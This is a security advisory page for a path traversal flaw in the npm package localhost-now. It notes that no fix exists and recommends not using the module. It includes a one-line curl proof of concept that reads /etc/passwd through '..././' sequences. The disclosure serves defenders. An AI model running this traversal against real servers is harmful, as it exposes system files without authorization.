VDB
Sign up
HIGH

GHSA-73cw-jxmm-qpgh

Path Traversal in localhost-now

Details

All versions of `localhost-now` are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2

Proof of concept:

``` $ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd" ```

## Recommendation

No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm/localhost-now
Introduced in: 0

No fixed version published yet for localhost-now (npm). Pin to a known-safe version or switch to an alternative.

References